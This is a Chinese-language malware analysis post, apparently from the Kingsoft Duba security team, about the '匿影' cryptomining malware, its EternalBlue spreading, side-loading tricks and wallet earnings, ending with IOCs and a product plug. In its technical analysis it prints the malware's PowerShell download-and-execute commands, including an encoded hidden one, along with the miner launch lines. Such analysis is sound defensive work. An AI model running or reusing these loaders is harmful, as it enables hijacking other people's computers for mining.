“匿影”挖矿病毒再度来袭，小心电脑沦为他人工具！

近期，金山毒霸安全团队再次捕获到“匿影”挖矿病毒，此病毒利用白加黑手法，通过NSA泄露工具包，永恒之蓝等漏洞进行横向传播，执行powershell脚本进行挖矿，感染传播，并且释放驱动对抗杀软。此病毒主要挖门罗币和Handshake(hns)，通过f2pool矿池进行挖矿。

门罗币向来是挖矿病毒的不二之选，因为其无法被追踪，隐匿的特性，当然还有其挖矿算法支持cpu，比较“亲民”，只要是电脑就可以进行cpu挖矿，而且其价格可观。当然病毒作者选HNS的道理也大同小异，隐匿，价格，“亲民”，当然能用GPU对病毒来说是更优的选择，毕竟来钱快嘛。

技术分析
“匿影”病毒家族，大部分恶意模块均采用VMP保护，包括驱动对抗程序，为提高分析的成本，增加分析难度。而且恶意病毒的下载传播的服务器空间，均使用三方服务、网盘、图床，很难捕捉其真实地址。

病毒执行流程图：

感染病毒计算机计划任务被添加自动运行恶意Powershell脚本：

Powershell命令行字符串为混淆字符串，解密后如下：

IEX((new-objectnet.webclient).downloadstring('http://cs.sslsngyl90.com'))

复制代码

Powershell加载执行下载后的恶意脚本，截取一些相似部分，主要功能为加载恶意PE文件，挖矿

(new-object System.Net.WebClient).DownloadFile( 'https://img.vim-cn.com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299','C:\ProgramData\WinRing0x64.sys')

复制代码

(new-object System.Net.WebClient).DownloadFile( 'https://img.vim-cn.com/fd/31611086fb633acbe818d26f0dc710bb8e5350','C:\ProgramData\officekms.exe')

复制代码

Start-Process -FilePath C:\ProgramData\officekms.exe '-o xmr.f2pool.com:13531 -u 47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b -p x -k'

复制代码

释放恶意PE文件

go.exe
go.exe是winrar创建的自解压程序，静默自动执行白文件XLBugReport.exe，此处利用手法为白加黑，利用迅雷模块加载病毒恶意模块。

XLBugReport.exe是迅雷的错误报告程序

svchost 是病毒自带模块（此处模拟系统模块命名，混淆视听），加载cpugpucom.dll

cpuxmdll函数为cpugpucom.dll里面的导出函数，内存动态解密，解密后为VMP Dump

svchost调用最终病毒解密代码调用Officekms.exe进行挖矿

释放驱动文件(命名随机 VMP壳)对抗杀软和ARK工具，HOOK内核回调，监控进程打开关

gtt.exe
Gtt.exe 也是winrar自解压程序，利用微软原始文件rekeywiz.exe（病毒文件名WorkstationPro.exe）文件白加黑调用自己的恶意模块duser.dll (VMP) , wininit.exe (VMP)

以下是WorkstationPro.exe白文件，通过VT查询它被其它病毒文件的利用情况，发现被许多恶意文件利用，可见白文件，白进程可能也需要我们格外关注了，表象的背后往往有一些捉摸不清的“交易”。

wininit.exe (VMP)调用其它模块（officekms.exe MicrosftEdgeCP.exe）进行挖矿

C:\ProgramData\officekms.exe -o xmr.f2pool.com:13531 -u 43uhqNUnb RnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1 zmLSZ27mWMzU9k7YMGmGD.xx -p x -k

复制代码

MicrosftEdgeCP.exe (VMP) 是被nb.exe释放

[/code]
[list][*][*][*][/list][code]C:\Users\Public\MicrosftEdgeCP.exe -a hns -o stratum+tcp://hns.f2pool.com:6000 -u hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw.019

复制代码

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -N onI -W Hidden -ep Bypass -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB4AHgALgBlAG0AYQBpAGwAbQBpAGMAbwBwAC4AYwBsAHUAYgAnACkAKQA=

复制代码

加载驱动(VMP)，对抗杀毒软和ARK工具，HOOK内核回调，监控进程打开关闭

nb.exe
功能为释放挖矿程序MicrosftEdgeCP.exe(VMP) 和 OhGodAnETHlargementPill-r2.exe

office.exe
office.exe 释放的文件主要目的为横向传播，利用永恒之蓝漏洞进行攻击

winlogtrf.exe为控制模块，调用永恒之蓝漏洞扫描器（开源Python版本）进行扫描

攻击成功，则发送payload（x64.dll），payload则会检测QQ管家，金山毒霸杀软和其它进程信息

如果没有杀软存在，则进行感染传播

挖矿信息
门罗币
此病毒主要通过f2pool矿池挖矿，所以不能直接获取其钱包地址，以下是测试账户，挖矿时是使用此矿池的地址而不是我们的钱包地址

f2pool门罗币的收益情况，这个地址为f2pool的挖矿地址

47XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b

复制代码

这个账号在有一天可以挖0.18个大约6.6美金

当然他不止一个账号，当然我想可以不仅仅只有下面几个门罗币挖矿地址

43BxCW7rEQBUtDudnUG1pc4sY9wvwaCCYh71wk8Lx9Vq5PtVMneSDp4fbh8HvtF4JyPtXcBGbW2FWN21b5MhZpN2REofAcy

复制代码

44ACdsQgNRRBLmLQAEvkVoCYAVmSpy2XsQvdvS4Srnbwf9tzrbMGEjigXbDCi8iT2LQznYV2DAzgCR6K5Y6vBth84oErPyg

复制代码

43uhqNUnbRnhnK54zH5cLKd1UjxzR8y4vbMBUwpTK4aL2uWv7jTphoR6vqhoGXDKfnQDB9qaA1zmLSZ27mWMzU9k7YMGmGD

复制代码

可以通过以下链接查询

复制代码

https://www.f2pool.com/xmr/addr

复制代码

Handshake
挖矿方式和上面的门罗币一样也是通过f2pool进行的挖矿，挖矿f2pool地址

hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw

复制代码

https://www.f2pool.com/hns/hs1qlxjqehrw8wth6pdwrhh0cls7y3nvpk0xdcufvw

复制代码

以下大概一个月的收益

总结：
可见挖矿病毒的收益还是很高的，当然这只是“借你之手”的获利，病毒在挖矿的时候会导致计算机卡顿，运行其它软件速度变慢，如果你有类似症状的时候，要想想是不是中了挖矿病毒了，及时安装金山毒霸扫描查杀，以免沦为他人的“工具”。

此病毒是通过BT下载器，激活工具等等免费破解工具进行的传播，友情提示，大家下载软件，尽量选择官方下载，第三方下载很有可能存在病毒捆绑，或者安装金山毒霸，即便不小心下载了恶意捆绑软件也可以及时查漏补缺，及时为你拦截相关病毒。

毒霸很好地支持计划任务，powershell，等关键可疑行为的查杀拦截

IOC：
MD5:
974b7dd2e5f32297ac498d4b4816014a
95dd28e23472e0f2c561b0168e4d4de3
ca8ab64cda1205f0993a84bc76ad894a
124d75d7214a16635828982c6c24b8d2
39e5b7e7a52c4f6f86f086298950c6b8
0c0195c48b6b8582fa6f6373032118da

URL:
hxxxx//cpu.sslsngyl90.com/vip.txt
hxxxx//img.vim-cn.com/d2/5340ae8e92a6d29f599fef426a2bc1b5217299
hxxxx//img.vim-cn.com/fd/31611086fb633acbe818d26f0dc710bb8e5350
hxxxx//img.vim-cn.com/4e/912136b5910ed971336606d1f325053b62889d
hxxxx//img.vim-cn.com/c9/b3a8ada87d992f7ef6fe68b6ecbadc339c71a1
hxxxx//img.vim-cn.com/82/651423b4a6a5fb251b87ebec0f44d1cd862c21